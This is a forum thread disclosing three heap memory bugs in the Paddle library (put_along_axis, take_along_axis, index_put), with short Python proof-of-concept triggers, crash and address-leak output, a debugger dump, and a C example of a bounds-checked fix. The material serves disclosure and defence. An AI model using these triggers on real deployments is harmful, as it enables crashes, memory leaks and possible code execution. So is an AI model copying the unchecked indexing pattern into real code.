Paddle Some heap overflow reports

shyt4zoc posted 3 months ago in Other
Follow (0) | Answers (3) | Views (34)

Bug description (Describe the Bug)

heap-buffer-overflow in function put_along_axis

Summary

The put_along_axis function will trigger a heap-buffer-overflow write under specific circumstances.

environment

paddle:develop(Nightly build)
os:ubuntu22.04
python:Python 3.10.12 (main, Mar 22 2024, 16:50:05) [GCC 11.4.0] on linux

Vulnerability Description

There is no limit to the index value passed to the put_along_axis function, which can cause heap OOB write.

Poc

import paddle

x = paddle.to_tensor([0])                # one-element int64 tensor, valid indices are only [0, 1)
index = paddle.to_tensor([0xdeadbeef])   # index far outside the tensor
out = paddle.put_along_axis(
    arr=x,
    indices=index,
    values=0xdeadbeef,                   # value stored at arr[index] along axis 0
    axis=0,
)
> /bin/python3 /home/hacker/Test/paddle_test/poc.py

--------------------------------------
C++ Traceback (most recent call last):
--------------------------------------
0   paddle::pybind::eager_api_put_along_axis(_object*, _object*, _object*)
1   put_along_axis_ad_func(paddle::Tensor const&, paddle::Tensor const&, paddle::Tensor const&, int, std::string)
2   paddle::experimental::put_along_axis(paddle::Tensor const&, paddle::Tensor const&, paddle::Tensor const&, int, std::string const&)
3   void phi::PutAlongAxisKernel<long, phi::CPUContext>(phi::CPUContext const&, phi::DenseTensor const&, phi::DenseTensor const&, phi::DenseTensor const&, int, std::string const&, phi::DenseTensor*)
4   void phi::funcs::cpu_scatter_assign_kernel<long, long>(phi::DenseTensor, int, phi::DenseTensor const&, phi::DenseTensor, phi::DeviceContext const&)

----------------------
Error Message Summary:
----------------------
FatalError: `Segmentation fault` is detected by the operating system.
  [TimeInfo: *** Aborted at 1710165968 (unix time) try "date -d @1710165968" if you are using GNU date ***]
  [SignalInfo: *** SIGSEGV (@0x6f95c6778) received by PID 13642 (TID 0x7f05e91a8740) from PID 18446744073598166904 ***]

[1]    13642 segmentation fault (core dumped)  /bin/python3 /home/hacker/Test/paddle_test/poc.py

Debug

Obviously, rcx is the value of the index we passed in, and r14 is a heap address. We can achieve heap overflow and out-of-bounds write by controlling the index.

Thread 1 "python3" received signal SIGSEGV, Segmentation fault.
0x00007ffff47f630f in void phi::funcs::cpu_scatter_assign_kernel<long, long>(phi::DenseTensor, int, phi::DenseTensor const&, phi::DenseTensor, phi::DeviceContext const&) () from /home/hacker/.local/lib/python3.8/site-packages/paddle/base/libpaddle.so
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────────────────────
*RAX  0x1
*RBX  0x4169000 ◂— 0xdeadbeef
*RCX  0xdeadbeef
*RDX  0x1
*RDI  0x416a000 ◂— 0xdeadbeef
*RSI  0x0
*R8   0x416a000 ◂— 0xdeadbeef
*R9   0x0
*R10  0x0
*R11  0x0
*R12  0x1
*R13  0xdeadbeef
*R14  0x416b000 ◂— 0x0
*R15  0x4169000 ◂— 0xdeadbeef
*RBP  0x7fffffffc480 —▸ 0x7fffffffc760 —▸ 0x7fffffffd050 —▸ 0x7fffffffd540 —▸ 0x7fffffffd690 ◂— ...
*RSP  0x7fffffffc1a0 —▸ 0x7fffffffc330 —▸ 0x7ffff6541d40 (vtable for phi::DenseTensor+16) —▸ 0x7fffed7fe200 (phi::DenseTensor::~DenseTensor()) ◂— push rbp
*RIP  0x7ffff47f630f (void phi::funcs::cpu_scatter_assign_kernel<long, long>(phi::DenseTensor, int, phi::DenseTensor const&, phi::DenseTensor, phi::DeviceContext const&)+1663) ◂— mov qword ptr [r14 + rcx*8], r13
───────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────────────────────
► 0x7ffff47f630f <void phi::funcs::cpu_scatter_assign_kernel<long, long>(...)+1663>    mov    qword ptr [r14 + rcx*8], r13
0x7ffff47f6313 <void phi::funcs::cpu_scatter_assign_kernel<long, long>(...)+1667>    cmp    rdx, rax
[......]
─────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────
[......]
───────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────
► 0   0x7ffff47f630f void phi::funcs::cpu_scatter_assign_kernel<long, long>(...)+1663
1   0x7ffff3806a3f void phi::PutAlongAxisKernel<long, phi::CPUContext>(...)+527
2   0x7fffed57cf54 paddle::experimental::put_along_axis(...)+5892
3   0x7fffeee48f5b put_along_axis_ad_func(...)+3387
4   0x7fffecafaf22 paddle::pybind::eager_api_put_along_axis(_object*, _object*, _object*)+994
5   0x7fffecd9506d
6         0x5d5499 PyCFunction_Call+89
7         0x5d6066 _PyObject_MakeTpCall+662
───────────────────────────────────────────────────────────────────────────────────────────[ THREADS (2 TOTAL) ]───────────────────────────────────────────────────────────────────────────────────────────
► 1	"python3" stopped: 0x7ffff47f630f <void phi::funcs::cpu_scatter_assign_kernel<long, long>(phi::DenseTensor, int, phi::DenseTensor const&, phi::DenseTensor, phi::DeviceContext const&)+1663> 
2	"python3" stopped: 0x7ffff7e9c23f <clock_nanosleep+223> 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Additional Supplementary Information

No response

vddsk6oq 1#

heap-buffer-overflow read in function take_along_axis

Summary

The take_along_axis function will trigger a heap-buffer-overflow read under specific circumstances.

environment

paddle:develop(Nightly build)
os:ubuntu22.04
python:Python 3.10.12 (main, Mar 22 2024, 16:50:05) [GCC 11.4.0] on linux

Vulnerability Description

There is no limit to the index value passed to the take_along_axis function, which can cause heap OOB read.

Poc

import paddle

for i in range(0x100):
    x = paddle.to_tensor([[0], [0]])     # 2x1 int64 tensor
    index = paddle.to_tensor([[-i]])     # index along axis 0 runs 0, -1, -2, ... off the front of the buffer
    axis = 0
    result = paddle.take_along_axis(x, index, axis)
    leak_val = result[0, 0].numpy()      # whatever was read from x[-i, 0]
    print("The offset:-0x" + f"{i:x}" + "-->0x" + f"{leak_val:x}")
> python3 poc.py
The offset:-0x0-->0x0
The offset:-0x1-->0x20
The offset:-0x2-->0xfe0
The offset:-0x3-->0x0
The offset:-0x4-->0x7fcba06bcca0
The offset:-0x5-->0x0
The offset:-0x6-->0x0
The offset:-0x7-->0x7ffe0000000f
The offset:-0x8-->0x0
The offset:-0x9-->0x0
The offset:-0xa-->0x5390fc0
The offset:-0xb-->0x0
The offset:-0xc-->0xff
The offset:-0xd-->0x0
The offset:-0xe-->0x0
The offset:-0xf-->0x0
The offset:-0x10-->0x7fcb9dca97c0
[......]
The offset:-0x1d-->0x10000000f
The offset:-0x1e-->0xf00000003
[......]
The offset:-0x3a-->0x7fcb0000000a
The offset:-0x3b-->0x0
The offset:-0x3c-->0x0
The offset:-0x3d-->0x538ce28
The offset:-0x3e-->0x0
The offset:-0x3f-->0x0
The offset:-0x40-->0x5393e10
The offset:-0x41-->0x0
The offset:-0x42-->0x0
The offset:-0x43-->0x0
The offset:-0x44-->0x0
The offset:-0x45-->0xf00000001
The offset:-0x46-->0x538dde0
[......]
The offset:-0x6b-->0x7fcba2126be0
[......]
The offset:-0x72-->0x7fcb00000003
The offset:-0x73-->0x0
The offset:-0x74-->0xf00000001
The offset:-0x75-->0x7ffe00000007
[......]
The offset:-0x7c-->0x5390c30
The offset:-0x7d-->0x0
The offset:-0x7e-->0x200000008
The offset:-0x7f-->0x0
The offset:-0x80-->0x538cc10
[......]
The offset:-0xa5-->0x5396ae8
The offset:-0xa6-->0x0
The offset:-0xa7-->0x0
The offset:-0xa8-->0x0
The offset:-0xa9-->0x0
The offset:-0xaa-->0x7fcb97d23a40
The offset:-0xab-->0x0
The offset:-0xac-->0x7fcb00000005
The offset:-0xad-->0x200000008
The offset:-0xae-->0xff
The offset:-0xaf-->0x0
The offset:-0xb0-->0x0
The offset:-0xb1-->0x0
The offset:-0xb2-->0x7fcb97d23a40
The offset:-0xb3-->0x0
The offset:-0xb4-->0x7fcb9e474d30
[......]
The offset:-0xde-->0x7fcba06bda58
[......]

This easily reveals the layout of memory data and various addresses.

2sbarzqh 2#

heap-buffer-overflow write in function index_put

Summary

The index_put function will trigger a heap-buffer-overflow write under specific circumstances.

environment

paddle:develop(Nightly build)
os:ubuntu22.04
python:Python 3.10.12 (main, Mar 22 2024, 16:50:05) [GCC 11.4.0] on linux

Vulnerability Description

There is no limit to the indices value passed to the paddle.index_put function, which can cause heap OOB write.

Poc

import paddle

for i in range(0x100):
    x = paddle.zeros([1])                # one-element float32 tensor
    value = paddle.ones([1])
    indices = (paddle.to_tensor([i]), paddle.to_tensor([1]))   # first index runs 0..255, past x's single element
    out = paddle.index_put(x, indices, value)
> python3 poc.py
free(): invalid next size (fast)

or:
> python3 poc.py
double free or corruption (out)

or:
> python3 poc.py
malloc(): invalid size (unsorted)

The prompt "free(): invalid next size (fast)" indicates an error reported by the glibc malloc heap manager due to memory being modified.
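The three reports above (the put_along_axis write in the original post, the take_along_axis read in answer 1# and the index_put write in this answer) share one root cause: the index tensor is used as a raw offset into the source or destination buffer. The faulting instruction in the first report, mov qword ptr [r14 + rcx*8], r13, is exactly data[index] = value with no comparison of index against the dimension size. The C program below is an added example and not Paddle's code: it shows that unchecked pattern beside a guarded version on a minimal 1-D int64 tensor and replays the indices from the three PoCs against the guarded kernels. The Tensor1D type, the function names and the Python-style normalisation of negative indices are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* Minimal stand-in for a 1-D int64 tensor (assumed type, not Paddle's DenseTensor). */
typedef struct {
    int64_t *data;
    int64_t  len;   /* number of elements along the indexed axis */
} Tensor1D;

/* --- Unchecked pattern: what the report's faulting instruction does ---
 * mov qword ptr [r14 + rcx*8], r13  ==  dst->data[idx] = value
 * Nothing sits between the caller-controlled idx and the memory access. */
void scatter_assign_unchecked(Tensor1D *dst, int64_t idx, int64_t value) {
    dst->data[idx] = value;            /* heap OOB write when idx is outside [0, len) */
}

int64_t gather_unchecked(const Tensor1D *src, int64_t idx) {
    return src->data[idx];             /* heap OOB read when idx is outside [0, len) */
}

/* --- Checked form ---
 * Returns the normalised index in [0, len), or -1 if idx is unusable.
 * Negative indices are mapped Python-style (-len <= idx < 0  ->  idx + len);
 * that policy is an assumption here. What matters is that every idx is
 * compared against len before any load or store happens. */
int64_t normalize_index(int64_t idx, int64_t len) {
    if (len <= 0) return -1;
    if (idx < 0) {
        if (idx < -len) return -1;     /* compare before adding: no wrap on INT64_MIN */
        idx += len;
    }
    return (idx < len) ? idx : -1;
}

int scatter_assign_checked(Tensor1D *dst, int64_t idx, int64_t value) {
    int64_t i = normalize_index(idx, dst->len);
    if (i < 0) return -1;              /* rejected; buffer untouched */
    dst->data[i] = value;
    return 0;
}

int gather_checked(const Tensor1D *src, int64_t idx, int64_t *out) {
    int64_t i = normalize_index(idx, src->len);
    if (i < 0) return -1;              /* rejected; nothing read */
    *out = src->data[i];
    return 0;
}

/* Replays the indices from the three reports against the checked kernels.
 * Returns 1 when every out-of-range index is rejected without touching the
 * buffer and every in-range one is served, 0 otherwise. */
int replay_reports(void) {
    int64_t buf[2] = {0, 0};           /* constructed sample data */
    Tensor1D two = { buf, 2 };
    Tensor1D one = { buf, 1 };
    int64_t v = -1;

    /* put_along_axis PoC: index 0xdeadbeef into a length-1 tensor */
    if (scatter_assign_checked(&one, 0xdeadbeefLL, 0xdeadbeefLL) != -1) return 0;
    if (buf[0] != 0 || buf[1] != 0) return 0;

    /* take_along_axis PoC: indices 0, -1, -2, ... walking backwards off the buffer */
    for (int64_t i = 0; i < 0x100; i++) {
        int rc = gather_checked(&two, -i, &v);
        if (i <= 2) { if (rc != 0 || v != 0) return 0; }   /* 0, -1, -2 are in range for len 2 */
        else        { if (rc != -1) return 0; }            /* beyond the front: rejected */
    }

    /* index_put PoC: indices 0..255 into a length-1 tensor; only 0 may land */
    for (int64_t i = 0; i < 0x100; i++) {
        int rc = scatter_assign_checked(&one, i, 1);
        if (i == 0) { if (rc != 0 || buf[0] != 1) return 0; }
        else        { if (rc != -1) return 0; }
    }
    if (buf[1] != 0) return 0;         /* the neighbouring element was never written */
    return 1;
}

int main(void) {
    printf("checked kernels reject the reported indices: %s\n",
           replay_reports() ? "yes" : "no");
    return 0;
}
```

The unchecked functions are kept only to show the shape of the bug; the replay deliberately calls the checked ones, since calling scatter_assign_unchecked with 0xdeadbeef would reproduce the segmentation fault from the first report rather than demonstrate anything. The check has to live in the kernel (or immediately before it, on the index tensor as a whole) because Python-level validation can be bypassed by any other caller of the same op.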

n53p2ov0 3#

Incidentally, I tried submitting these three reports to paddle-security@baidu.com but received no reply. So I would like to ask: are memory errors currently classified as vulnerabilities, or as bugs?
